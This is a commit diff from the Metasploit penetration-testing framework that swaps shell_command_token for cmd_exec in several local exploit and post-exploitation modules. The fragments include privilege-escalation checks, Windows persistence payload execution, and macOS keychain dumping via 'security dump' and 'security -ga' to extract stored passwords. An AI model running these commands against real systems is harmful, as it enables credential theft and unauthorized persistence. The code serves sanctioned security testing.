Land rapid7#5581, s/shell_command_token/cmd_exec/

Author: wvu

modules/exploits/freebsd/local/mmap.rb

@@ -55,7 +55,7 @@ def initialize(info={})
   end
 
   def check
-    res = session.shell_command_token("uname -a")
+    res = cmd_exec('uname -a')
     return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
 
     Exploit::CheckCode::Safe

modules/exploits/osx/local/setuid_tunnelblick.rb

@@ -61,7 +61,7 @@ def check
       return CheckCode::Safe
     end
 
-    check = session.shell_command_token("find  #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
+    check = cmd_exec("find  #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
 
     if check =~ /openvpnstart/
       return CheckCode::Vulnerable

modules/exploits/osx/local/setuid_viscosity.rb

@@ -61,7 +61,7 @@ def check
       return CheckCode::Safe
     end
 
-    check = session.shell_command_token("find  #{datastore["Viscosity"]} -type f -user root -perm -4000")
+    check = cmd_exec("find  #{datastore["Viscosity"]} -type f -user root -perm -4000")
 
     if check =~ /ViscosityHelper/
       return CheckCode::Vulnerable

modules/exploits/windows/local/persistence.rb

@@ -230,9 +230,9 @@ def target_exec(script_on_target)
     # Error handling for process.execute() can throw a RequestError in send_request.
     begin
       unless datastore['EXE::Custom']
-        session.shell_command_token(script_on_target)
+        cmd_exec("wscript \"#{script_on_target}\"")
       else
-        session.shell_command_token("cscript \"#{script_on_target}\"")
+        cmd_exec("cscript \"#{script_on_target}\"")
       end
     rescue
       print_error("Failed to execute payload on target")

modules/post/multi/gather/enum_vbox.rb

@@ -16,10 +16,10 @@ def initialize(info={})
     super( update_info(info,
       'Name'           => 'Multi Gather VirtualBox VM Enumeration',
       'Description'    => %q{
-                This module will attempt to enumerate any VirtualBox VMs on the target machine.
-                Due to the nature of VirtualBox, this module can only enumerate VMs registered
-                for the current user, thereforce, this module needs to be invoked from a user context.
-                },
+        This module will attempt to enumerate any VirtualBox VMs on the target machine.
+        Due to the nature of VirtualBox, this module can only enumerate VMs registered
+        for the current user, thereforce, this module needs to be invoked from a user context.
+      },
       'License'        => MSF_LICENSE,
       'Author'         => ['theLightCosine'],
       'Platform'       => %w{ bsd linux osx unix win },
@@ -29,27 +29,37 @@ def initialize(info={})
 
   def run
     if session.platform =~ /win/
-      res = session.shell_command_token_win32('"c:\Program Files\Oracle\VirtualBox\vboxmanage" list -l vms') || ''
-      if res.include? "The system cannot find the path specified"
-        print_error "VirtualBox does not appear to be installed on this machine"
-        return nil
-      elsif res == "\n"
-        print_status "VirtualBox is installed but this user has no VMs registered. Try another user."
-        return nil
+      if session.type == 'meterpreter'
+        begin
+          res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')
+        rescue ::Rex::Post::Meterpreter::RequestError
+          print_error('VirtualBox does not appear to be installed on this machine')
+          return nil
+        end
+
+        if res.empty?
+          print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')
+          return nil
+        end
+      else
+        res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')
+        if res.empty?
+          print_error('VirtualBox isn\'t installed or this user has no VMs registered')
+          return nil
+        end
       end
     elsif session.platform =~ /unix|linux|bsd|osx/
-      res = session.shell_command('vboxmanage list -l vms')
-      unless res.start_with? "Sun VirtualBox"
-        print_error "VirtualBox does not appear to be installed on this machine"
-        return nil
-      end
-      unless res.include? "Name:"
-        print_status "VirtualBox is installed but this user has no VMs registered. Try another user."
+      res = cmd_exec('vboxmanage list -l vms')
+
+      unless res.start_with?('Sun VirtualBox') || res.include?('Name:')
+        print_error('VirtualBox isn\'t installed or this user has no VMs registered')
         return nil
       end
     end
-    print_good res
-    store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
+
+    vprint_status(res)
+    store_path = store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
+    print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
   end
 
 

modules/post/multi/gather/env.rb

@@ -42,7 +42,7 @@ def get_env_shell
       @ltype = "unix.environment"
       cmd = "env"
     end
-    @output = session.shell_command_token(cmd)
+    @output = cmd_exec(cmd)
   end
 
   def get_env_meterpreter

modules/post/osx/gather/enum_keychain.rb

@@ -29,16 +29,16 @@ def initialize(info={})
   end
 
   def list_keychains
-    keychains = session.shell_command_token("security list")
-    user = session.shell_command_token("whoami")
+    keychains = cmd_exec("security list")
+    user = cmd_exec("whoami")
     print_status("The following keychains for #{user.strip} were found:")
     print_line(keychains.chomp)
     return keychains =~ /No such file or directory/ ? nil : keychains
   end
 
   def enum_accounts(keychains)
-    user =  session.shell_command_token("whoami").chomp
-    out = session.shell_command_token("security dump | egrep 'acct|desc|srvr|svce'")
+    user =  cmd_exec("whoami").chomp
+    out = cmd_exec("security dump | egrep 'acct|desc|srvr|svce'")
 
     i = 0
     accounts = {}
@@ -73,7 +73,7 @@ def get_passwords(accounts)
         s = accounts[num]["svce"]
       end
 
-      cmd = session.shell_command_token("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
+      cmd = cmd_exec("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
 
       cmd.split("\n").each do |line|
         if line =~ /password: /
@@ -109,7 +109,7 @@ def run
       return
     end
 
-    user = session.shell_command_token("/usr/bin/whoami").chomp
+    user = cmd_exec("/usr/bin/whoami").chomp
     accounts = enum_accounts(keychains)
     save(accounts)